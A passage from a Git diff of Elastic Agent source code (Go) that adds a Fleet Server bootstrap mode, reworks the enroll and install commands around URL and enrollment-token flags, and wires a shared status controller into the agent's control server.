"github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" + logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" +) + +// FleetServerBootstrap application, does just enough to get a Fleet Server up and running so enrollment +// can complete. +type FleetServerBootstrap struct { + bgContext context.Context + cancelCtxFn context.CancelFunc + log *logger.Logger + Config configuration.FleetAgentConfig + agentInfo *info.AgentInfo + router *router + source source + srv *server.Server +} + +func newFleetServerBootstrap( + ctx context.Context, + log *logger.Logger, + pathConfigFile string, + rawConfig *config.Config, + statusCtrl status.Controller, + agentInfo *info.AgentInfo, +) (*FleetServerBootstrap, error) { + cfg, err := configuration.NewFromConfig(rawConfig) + if err != nil { + return nil, err + } + + if log == nil { + log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig) + if err != nil { + return nil, err + } + } + + logR := logreporter.NewReporter(log) + + sysInfo, err := sysinfo.Host() + if err != nil { + return nil, errors.New(err, + "fail to get system information", + errors.TypeUnexpected) + } + + bootstrapApp := &FleetServerBootstrap{ + log: log, + agentInfo: agentInfo, + } + + bootstrapApp.bgContext, bootstrapApp.cancelCtxFn = context.WithCancel(ctx) + bootstrapApp.srv, err = server.NewFromConfig(log, cfg.Settings.GRPC, &operation.ApplicationStatusHandler{}) + if err != nil { + return nil, errors.New(err, "initialize GRPC listener") + } + + reporter := reporting.NewReporter(bootstrapApp.bgContext, log, bootstrapApp.agentInfo, logR) + + monitor, err := monitoring.NewMonitor(cfg.Settings) + if err != nil { + return nil, errors.New(err, "failed to initialize monitoring") + } + + router, err := newRouter(log, streamFactory(bootstrapApp.bgContext, agentInfo, cfg.Settings, bootstrapApp.srv, reporter, monitor, statusCtrl)) + if err != nil { + return nil, errors.New(err, "fail to initialize pipeline router") + } + bootstrapApp.router = router + + emit, err := bootstrapEmitter( + bootstrapApp.bgContext, + log, + agentInfo, + router, + &configModifiers{ + Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, + }, + ) + if err != nil { + return nil, err + } + + discover := discoverer(pathConfigFile, cfg.Settings.Path) + bootstrapApp.source = newOnce(log, discover, emit) + return bootstrapApp, nil +} + +// Start starts a managed elastic-agent. +func (b *FleetServerBootstrap) Start() error { + b.log.Info("Agent is starting") + defer b.log.Info("Agent is stopped") + + if err := b.srv.Start(); err != nil { + return err + } + if err := b.source.Start(); err != nil { + return err + } + + return nil +} + +// Stop stops a local agent. +func (b *FleetServerBootstrap) Stop() error { + err := b.source.Stop() + b.cancelCtxFn() + b.router.Shutdown() + b.srv.Stop() + return err +} + +// AgentInfo retrieves elastic-agent information. +func (b *FleetServerBootstrap) AgentInfo() *info.AgentInfo { + return b.agentInfo +} + +func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers) (emitterFunc, error) { + ch := make(chan *config.Config) + + go func() { + for { + var c *config.Config + select { + case <-ctx.Done(): + return + case c = <-ch: + } + + err := emit(log, agentInfo, router, modifiers, c) + if err != nil { + log.Error(err) + } + } + }() + + return func(c *config.Config) error { + ch <- c + return nil + }, nil +} + +func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers, c *config.Config) error { + if err := InjectAgentConfig(c); err != nil { + return err + } + + // perform and verify ast translation + m, err := c.ToMapStr() + if err != nil { + return errors.New(err, "could not create the AST from the configuration", errors.TypeConfig) + } + ast, err := transpiler.NewAST(m) + if err != nil { + return errors.New(err, "could not create the AST from the configuration", errors.TypeConfig) + } + for _, filter := range modifiers.Filters { + if err := filter(log, ast); err != nil { + return errors.New(err, "failed to filter configuration", errors.TypeConfig) + } + } + + // overwrite the inputs to only have a single fleet-server input + transpiler.Insert(ast, transpiler.NewList([]transpiler.Node{ + transpiler.NewDict([]transpiler.Node{ + transpiler.NewKey("type", transpiler.NewStrVal("fleet-server")), + }), + }), "inputs") + + spec, ok := program.SupportedMap["fleet-server"] + if !ok { + return errors.New("missing required fleet-server program specification") + } + ok, err = program.DetectProgram(spec, agentInfo, ast) + if err != nil { + return errors.New(err, "failed parsing the configuration") + } + if !ok { + return errors.New("bootstrap configuration is incorrect causing fleet-server to not be started") + } + + return router.Dispatch(ast.HashStr(), map[routingKey][]program.Program{ + defautlRK: { + { + Spec: spec, + Config: ast, + }, + }, + }) +} diff --git a/x-pack/elastic-agent/pkg/agent/application/local_mode.go b/x-pack/elastic-agent/pkg/agent/application/local_mode.go index e805c7423aad..2c1b33f83bae 100644 --- a/x-pack/elastic-agent/pkg/agent/application/local_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/local_mode.go @@ -20,6 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/dir" reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" @@ -63,11 +64,11 @@ func newLocal( pathConfigFile string, rawConfig *config.Config, reexec reexecManager, + statusCtrl status.Controller, uc upgraderControl, agentInfo *info.AgentInfo, ) (*Local, error) { - statusController := &noopController{} - caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusController) + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusCtrl) if err != nil { return nil, err } @@ -104,7 +105,7 @@ func newLocal( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusController)) + router, err := newRouter(log, streamFactory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go index c5c6d542d8f8..c12c2451e3a8 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go @@ -52,7 +52,7 @@ type Managed struct { Config configuration.FleetAgentConfig api apiClient agentInfo *info.AgentInfo - gateway *fleetGateway + gateway FleetGateway router *router srv *server.Server stateStore *stateStore @@ -62,58 +62,18 @@ type Managed struct { func newManaged( ctx context.Context, log *logger.Logger, + store storage.Store, + cfg *configuration.Configuration, rawConfig *config.Config, reexec reexecManager, + statusCtrl status.Controller, agentInfo *info.AgentInfo, ) (*Managed, error) { - statusController := status.NewController(log) - caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusController) + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusCtrl) if err != nil { return nil, err } - path := info.AgentConfigFile() - - store := storage.NewDiskStore(path) - reader, err := store.Load() - if err != nil { - return nil, errors.New(err, "could not initialize config store", - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - config, err := config.NewConfigFrom(reader) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to read configuration %s for the elastic-agent", path), - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - // merge local configuration and configuration persisted from fleet. - err = rawConfig.Merge(config) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to merge configuration with %s for the elastic-agent", path), - errors.TypeConfig, - errors.M(errors.MetaKeyPath, path)) - } - - cfg, err := configuration.NewFromConfig(rawConfig) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to unpack configuration from %s", path), - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - if err := cfg.Fleet.Valid(); err != nil { - return nil, errors.New(err, - "fleet configuration is invalid", - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - client, err := fleetapi.NewAuthWithConfig(log, cfg.Fleet.AccessAPIKey, cfg.Fleet.Kibana) if err != nil { return nil, errors.New(err, @@ -158,7 +118,7 @@ func newManaged( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusController)) + router, err := newRouter(log, streamFactory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -177,7 +137,7 @@ func newManaged( router, &configModifiers{ Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker, injectFleet(config, sysInfo.Info(), agentInfo)}, + Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, }, caps, monitor, @@ -287,12 +247,16 @@ func newManaged( actionDispatcher, fleetR, actionAcker, - statusController, + statusCtrl, stateStore, ) if err != nil { return nil, err } + gateway, err = wrapLocalFleetServer(managedApplication.bgContext, log, cfg.Fleet, rawConfig, gateway, emit) + if err != nil { + return nil, err + } // add the gateway to setters, so the gateway can be updated // when the hosts for Kibana are updated by the policy. policyChanger.setters = append(policyChanger.setters, gateway) @@ -309,11 +273,15 @@ func (m *Managed) Start() error { return nil } - if err := m.upgrader.Ack(m.bgContext); err != nil { + err := m.upgrader.Ack(m.bgContext) + if err != nil { m.log.Warnf("failed to ack update %v", err) } - m.gateway.Start() + err = m.gateway.Start() + if err != nil { + return err + } return nil } diff --git a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go b/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go index 1c55fda08e7b..b229f3cff080 100644 --- a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go +++ b/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go @@ -5,20 +5,23 @@ package application import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" ) type noopController struct{} -func (*noopController) Register(_ string) status.Reporter { return &noopReporter{} } -func (*noopController) RegisterWithPersistance(_ string, _ bool) status.Reporter { +func (*noopController) RegisterComponent(_ string) status.Reporter { return &noopReporter{} } +func (*noopController) RegisterComponentWithPersistance(_ string, _ bool) status.Reporter { return &noopReporter{} } -func (*noopController) Status() status.AgentStatus { return status.Healthy } -func (*noopController) UpdateStateID(_ string) {} -func (*noopController) StatusString() string { return "online" } +func (*noopController) RegisterApp(_ string, _ string) status.Reporter { return &noopReporter{} } +func (*noopController) Status() status.AgentStatus { return status.AgentStatus{Status: status.Healthy} } +func (*noopController) StatusCode() status.AgentStatusCode { return status.Healthy } +func (*noopController) UpdateStateID(_ string) {} +func (*noopController) StatusString() string { return "online" } type noopReporter struct{} -func (*noopReporter) Update(status.AgentStatus) {} -func (*noopReporter) Unregister() {} +func (*noopReporter) Update(_ state.Status, _ string) {} +func (*noopReporter) Unregister() {} diff --git a/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go b/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go index 4e75d92fb1d3..e23764b90564 100644 --- a/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go @@ -220,7 +220,7 @@ func (u *Upgrader) ackAction(ctx context.Context, action fleetapi.Action) error u.reporter.OnStateChange( "", agentName, - state.State{Status: state.Running}, + state.State{Status: state.Healthy}, ) return nil diff --git a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go index 282ea2f46454..58c99306e710 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go @@ -7,34 +7,27 @@ package cmd import ( "context" "fmt" - "math/rand" "os" - "time" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "os/signal" + "syscall" "github.com/spf13/cobra" - "github.com/elastic/beats/v7/libbeat/common/backoff" c "github.com/elastic/beats/v7/libbeat/common/cli" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/warn" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -var defaultDelay = 1 * time.Second - func newEnrollCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ - Use: "enroll ", + Use: "enroll", Short: "Enroll the Agent into Fleet", Long: "This will enroll the Agent into Fleet.", - Args: cobra.ExactArgs(2), Run: func(c *cobra.Command, args []string) { if err := enroll(streams, c, flags, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) @@ -55,19 +48,51 @@ func newEnrollCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStr } func addEnrollFlags(cmd *cobra.Command) { + cmd.Flags().StringP("url", "", "", "URL to enroll Agent into Fleet") + cmd.Flags().StringP("kibana-url", "k", "", "URL of Kibana to enroll Agent into Fleet") + cmd.Flags().StringP("enrollment-token", "t", "", "Enrollment token to use to enroll Agent into Fleet") + cmd.Flags().StringP("fleet-server", "", "", "Start and run a Fleet Server along side this Elastic Agent") + cmd.Flags().StringP("fleet-server-policy", "", "", "Start and run a Fleet Server on this specific policy") cmd.Flags().StringP("certificate-authorities", "a", "", "Comma separated list of root certificate for server verifications") cmd.Flags().StringP("ca-sha256", "p", "", "Comma separated list of certificate authorities hash pins used for certificate verifications") cmd.Flags().BoolP("insecure", "i", false, "Allow insecure connection to Kibana") cmd.Flags().StringP("staging", "", "", "Configures agent to download artifacts from a staging build") } -func buildEnrollmentFlags(cmd *cobra.Command) []string { +func buildEnrollmentFlags(cmd *cobra.Command, url string, token string) []string { + if url == "" { + url, _ = cmd.Flags().GetString("url") + } + if url == "" { + url, _ = cmd.Flags().GetString("kibana-url") + } + if token == "" { + token, _ = cmd.Flags().GetString("enrollment-token") + } + fServer, _ := cmd.Flags().GetString("fleet-server") + fPolicy, _ := cmd.Flags().GetString("fleet-server-policy") ca, _ := cmd.Flags().GetString("certificate-authorities") sha256, _ := cmd.Flags().GetString("ca-sha256") insecure, _ := cmd.Flags().GetBool("insecure") staging, _ := cmd.Flags().GetString("staging") args := []string{} + if url != "" { + args = append(args, "--url") + args = append(args, url) + } + if token != "" { + args = append(args, "--enrollment-token") + args = append(args, token) + } + if fServer != "" { + args = append(args, "--fleet-server") + args = append(args, fServer) + } + if fPolicy != "" { + args = append(args, "--fleet-server-policy") + args = append(args, fPolicy) + } if ca != "" { args = append(args, "--certificate-authorities") args = append(args, ca) @@ -116,9 +141,11 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } } + noRestart, _ := cmd.Flags().GetBool("no-restart") force, _ := cmd.Flags().GetBool("force") if fromInstall { force = true + noRestart = true } // prompt only when it is not forced and is already enrolled @@ -133,23 +160,26 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } } - insecure, _ := cmd.Flags().GetBool("insecure") - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) if err != nil { return err } - url := args[0] - enrollmentToken := args[1] + insecure, _ := cmd.Flags().GetBool("insecure") + url, _ := cmd.Flags().GetString("url") + if url == "" { + url, _ = cmd.Flags().GetString("kibana-url") + } + enrollmentToken, _ := cmd.Flags().GetString("enrollment-token") + fServer, _ := cmd.Flags().GetString("fleet-server") + fPolicy, _ := cmd.Flags().GetString("fleet-server-policy") caStr, _ := cmd.Flags().GetString("certificate-authorities") CAs := cli.StringToSlice(caStr) - caSHA256str, _ := cmd.Flags().GetString("ca-sha256") caSHA256 := cli.StringToSlice(caSHA256str) - delay(defaultDelay) + ctx := handleSignal(context.Background()) options := application.EnrollCmdOption{ ID: "", // TODO(ph), This should not be an empty string, will clarify in a new PR. @@ -160,6 +190,9 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args Insecure: insecure, UserProvidedMetadata: make(map[string]interface{}), Staging: staging, + FleetServerConnStr: fServer, + FleetServerPolicyID: fPolicy, + NoRestart: noRestart, } c, err := application.NewEnrollCmd( @@ -172,46 +205,29 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args return err } - err = c.Execute() - signal := make(chan struct{}) - - backExp := backoff.NewExpBackoff(signal, 60*time.Second, 10*time.Minute) - - for errors.Is(err, fleetapi.ErrTooManyRequests) { - fmt.Fprintln(streams.Out, "Too many requests on the remote server, will retry in a moment.") - backExp.Wait() - fmt.Fprintln(streams.Out, "Retrying to enroll...") - err = c.Execute() - } - - close(signal) - - if err != nil { - return errors.New(err, "fail to enroll") + err = c.Execute(ctx) + if err == nil { + fmt.Fprintln(streams.Out, "Successfully enrolled the Elastic Agent.") } + return err +} - fmt.Fprintln(streams.Out, "Successfully enrolled the Elastic Agent.") +func handleSignal(ctx context.Context) context.Context { + ctx, cfunc := context.WithCancel(ctx) - // skip restarting - noRestart, _ := cmd.Flags().GetBool("no-restart") - if noRestart || fromInstall { - return nil - } + sigs := make(chan os.Signal, 1) + signal.Notify(sigs, syscall.SIGINT, syscall.SIGKILL, syscall.SIGTERM, syscall.SIGQUIT) - daemon := client.New() - err = daemon.Connect(context.Background()) - if err == nil { - defer daemon.Disconnect() - err = daemon.Restart(context.Background()) - if err == nil { - fmt.Fprintln(streams.Out, "Successfully triggered restart on running Elastic Agent.") - return nil + go func() { + select { + case <-sigs: + cfunc() + case <-ctx.Done(): } - } - fmt.Fprintln(streams.Out, "Elastic Agent might not be running; unable to trigger restart") - return nil -} -func delay(t time.Duration) { - <-time.After(time.Duration(rand.Int63n(int64(t)))) + signal.Stop(sigs) + close(sigs) + }() + + return ctx } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/install.go b/x-pack/elastic-agent/pkg/agent/cmd/install.go index 7fd5b23ea18f..d978cd72d78d 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/install.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/install.go @@ -37,8 +37,6 @@ would like the Agent to operate. }, } - cmd.Flags().StringP("kibana-url", "k", "", "URL of Kibana to enroll Agent into Fleet") - cmd.Flags().StringP("enrollment-token", "t", "", "Enrollment token to use to enroll Agent into Fleet") cmd.Flags().BoolP("force", "f", false, "Force overwrite the current and do not prompt for confirmation") addEnrollFlags(cmd) @@ -93,9 +91,12 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, enroll := true askEnroll := true - kibana, _ := cmd.Flags().GetString("kibana-url") + url, _ := cmd.Flags().GetString("url") + if url == "" { + url, _ = cmd.Flags().GetString("kibana-url") + } token, _ := cmd.Flags().GetString("enrollment-token") - if kibana != "" && token != "" { + if url != "" && token != "" { askEnroll = false } if force { @@ -111,18 +112,18 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, enroll = false } } - if !askEnroll && (kibana == "" || token == "") { + if !askEnroll && (url == "" || token == "") { // force was performed without required enrollment arguments, all done (standalone mode) enroll = false } if enroll { - if kibana == "" { - kibana, err = c.ReadInput("Kibana URL you want to enroll this Agent into:") + if url == "" { + url, err = c.ReadInput("URL you want to enroll this Agent into:") if err != nil { return fmt.Errorf("problem reading prompt response") } - if kibana == "" { + if url == "" { fmt.Fprintf(streams.Out, "Enrollment cancelled because no URL was provided.\n") return nil } @@ -144,16 +145,33 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, return err } + defer func() { + if err != nil { + install.Uninstall() + } + }() + + err = install.StartService() + if err != nil { + fmt.Fprintf(streams.Out, "Installation failed to start Elastic Agent service.\n") + return err + } + + defer func() { + if err != nil { + install.StopService() + } + }() + if enroll { - enrollArgs := []string{"enroll", kibana, token, "--from-install"} - enrollArgs = append(enrollArgs, buildEnrollmentFlags(cmd)...) + enrollArgs := []string{"enroll", "--from-install"} + enrollArgs = append(enrollArgs, buildEnrollmentFlags(cmd, url, token)...) enrollCmd := exec.Command(install.ExecutablePath(), enrollArgs...) enrollCmd.Stdin = os.Stdin enrollCmd.Stdout = os.Stdout enrollCmd.Stderr = os.Stderr err = enrollCmd.Start() if err != nil { - install.Uninstall() return fmt.Errorf("failed to execute enroll command: %s", err) } err = enrollCmd.Wait() @@ -167,11 +185,5 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, } } - err = install.StartService() - if err != nil { - fmt.Fprintf(streams.Out, "Installation of required system files was successful, but starting of the service failed.\n") - return err - } - fmt.Fprintf(streams.Out, "Installation was successful and Elastic Agent is running.\n") return nil } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/run.go b/x-pack/elastic-agent/pkg/agent/cmd/run.go index ecfac4ff7405..8d4157fdadd9 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/run.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/run.go @@ -16,6 +16,8 @@ import ( "strings" "syscall" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/spf13/cobra" "github.com/elastic/beats/v7/libbeat/api" @@ -129,14 +131,16 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se rexLogger := logger.Named("reexec") rex := reexec.NewManager(rexLogger, execPath) + statusCtrl := status.NewController(logger) + // start the control listener - control := server.New(logger.Named("control"), rex, nil) + control := server.New(logger.Named("control"), rex, statusCtrl, nil) if err := control.Start(); err != nil { return err } defer control.Stop() - app, err := application.New(logger, pathConfigFile, rex, control, agentInfo) + app, err := application.New(logger, pathConfigFile, rex, statusCtrl, control, agentInfo) if err != nil { return err } diff --git a/x-pack/elastic-agent/pkg/agent/configuration/fleet.go b/x-pack/elastic-agent/pkg/agent/configuration/fleet.go index c8315b81cf08..af60651a3626 100644 --- a/x-pack/elastic-agent/pkg/agent/configuration/fleet.go +++ b/x-pack/elastic-agent/pkg/agent/configuration/fleet.go @@ -18,11 +18,17 @@ type FleetAgentConfig struct { Kibana *kibana.Config `config:"kibana" yaml:"kibana"` Reporting *fleetreporter.Config `config:"reporting" yaml:"reporting"` Info *AgentInfo `config:"agent" yaml:"agent"` + Server *FleetServerConfig `config:"server" yaml:"server,omitempty"` } // Valid validates the required fields for accessing the API. func (e *FleetAgentConfig) Valid() error { if e.Enabled { + if e.Server != nil && e.Server.Bootstrap { + // bootstrapping Fleet Server, checks below can be ignored + return nil + } + if len(e.AccessAPIKey) == 0 { return errors.New("empty access token", errors.TypeConfig) } diff --git a/x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go b/x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go new file mode 100644 index 000000000000..3ff7ad91b2e4 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/configuration/fleet_server.go @@ -0,0 +1,68 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package configuration + +import ( + "net/url" + + "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" +) + +// FleetServerConfig is the configuration written so Elastic Agent can run Fleet Server. +type FleetServerConfig struct { + Bootstrap bool `config:"bootstrap" yaml:"bootstrap,omitempty"` + Policy *FleetServerPolicyConfig `config:"policy" yaml:"policy,omitempty"` + Output FleetServerOutputConfig `config:"output" yaml:"output,omitempty"` +} + +// FleetServerPolicyConfig is the configuration for the policy Fleet Server should run on. +type FleetServerPolicyConfig struct { + ID string `config:"id"` +} + +// FleetServerOutputConfig is the connection for Fleet Server to call to Elasticsearch. +type FleetServerOutputConfig struct { + Elasticsearch Elasticsearch `config:"elasticsearch" yaml:"elasticsearch"` +} + +// Elasticsearch is the configuration for elasticsearch. +type Elasticsearch struct { + Protocol string `config:"protocol" yaml:"protocol"` + Hosts []string `config:"hosts" yaml:"hosts"` + Path string `config:"path" yaml:"path,omitempty"` + Username string `config:"username" yaml:"username"` + Password string `config:"password" yaml:"password"` + TLS *tlscommon.Config `config:"ssl" yaml:"ssl,omitempty"` +} + +// ElasticsearchFromConnStr returns an Elasticsearch configuration from the connection string. +func ElasticsearchFromConnStr(conn string) (Elasticsearch, error) { + u, err := url.Parse(conn) + if err != nil { + return Elasticsearch{}, err + } + if u.Scheme != "http" && u.Scheme != "https" { + return Elasticsearch{}, errors.New("invalid connection string: scheme must be http or https") + } + if u.Host == "" { + return Elasticsearch{}, errors.New("invalid connection string: must include a host") + } + if u.User == nil || u.User.Username() == "" { + return Elasticsearch{}, errors.New("invalid connection string: must include a username") + } + password, ok := u.User.Password() + if !ok { + return Elasticsearch{}, errors.New("invalid connection string: must include a password") + } + return Elasticsearch{ + Protocol: u.Scheme, + Hosts: []string{u.Host}, + Path: u.Path, + Username: u.User.Username(), + Password: password, + TLS: nil, + }, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/control/control_test.go b/x-pack/elastic-agent/pkg/agent/control/control_test.go index 5c56aed46913..bcda4a0e4edf 100644 --- a/x-pack/elastic-agent/pkg/agent/control/control_test.go +++ b/x-pack/elastic-agent/pkg/agent/control/control_test.go @@ -8,6 +8,8 @@ import ( "context" "testing" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" @@ -20,7 +22,7 @@ import ( ) func TestServerClient_Version(t *testing.T) { - srv := server.New(newErrorLogger(t), nil, nil) + srv := server.New(newErrorLogger(t), nil, nil, nil) err := srv.Start() require.NoError(t, err) defer srv.Stop() @@ -41,6 +43,29 @@ func TestServerClient_Version(t *testing.T) { }, ver) } +func TestServerClient_Status(t *testing.T) { + l := newErrorLogger(t) + statusCtrl := status.NewController(l) + srv := server.New(l, nil, statusCtrl, nil) + err := srv.Start() + require.NoError(t, err) + defer srv.Stop() + + c := client.New() + err = c.Connect(context.Background()) + require.NoError(t, err) + defer c.Disconnect() + + status, err := c.Status(context.Background()) + require.NoError(t, err) + + assert.Equal(t, &client.AgentStatus{ + Status: client.Healthy, + Message: "", + Applications: []*client.ApplicationStatus{}, + }, status) +} + func newErrorLogger(t *testing.T) *logger.Logger { t.Helper() diff --git a/x-pack/elastic-agent/pkg/agent/control/server/server.go b/x-pack/elastic-agent/pkg/agent/control/server/server.go index 0ce970c92569..edd96efdad64 100644 --- a/x-pack/elastic-agent/pkg/agent/control/server/server.go +++ b/x-pack/elastic-agent/pkg/agent/control/server/server.go @@ -17,26 +17,29 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) // Server is the daemon side of the control protocol. type Server struct { - logger *logger.Logger - rex reexec.ExecManager - up *upgrade.Upgrader - listener net.Listener - server *grpc.Server - lock sync.RWMutex + logger *logger.Logger + rex reexec.ExecManager + statusCtrl status.Controller + up *upgrade.Upgrader + listener net.Listener + server *grpc.Server + lock sync.RWMutex } // New creates a new control protocol server. -func New(log *logger.Logger, rex reexec.ExecManager, up *upgrade.Upgrader) *Server { +func New(log *logger.Logger, rex reexec.ExecManager, statusCtrl status.Controller, up *upgrade.Upgrader) *Server { return &Server{ - logger: log, - rex: rex, - up: up, + logger: log, + rex: rex, + statusCtrl: statusCtrl, + up: up, } } @@ -95,11 +98,11 @@ func (s *Server) Version(_ context.Context, _ *proto.Empty) (*proto.VersionRespo // Status returns the overall status of the agent. func (s *Server) Status(_ context.Context, _ *proto.Empty) (*proto.StatusResponse, error) { - // not implemented + status := s.statusCtrl.Status() return &proto.StatusResponse{ - Status: proto.Status_HEALTHY, - Message: "not implemented", - Applications: nil, + Status: agentStatusToProto(status.Status), + Message: status.Message, + Applications: agentAppStatusToProto(status.Applications), }, nil } @@ -158,3 +161,27 @@ func (r *upgradeRequest) FleetAction() *fleetapi.ActionUpgrade { // upgrade request not from Fleet return nil } + +func agentStatusToProto(code status.AgentStatusCode) proto.Status { + if code == status.Degraded { + return proto.Status_DEGRADED + } + 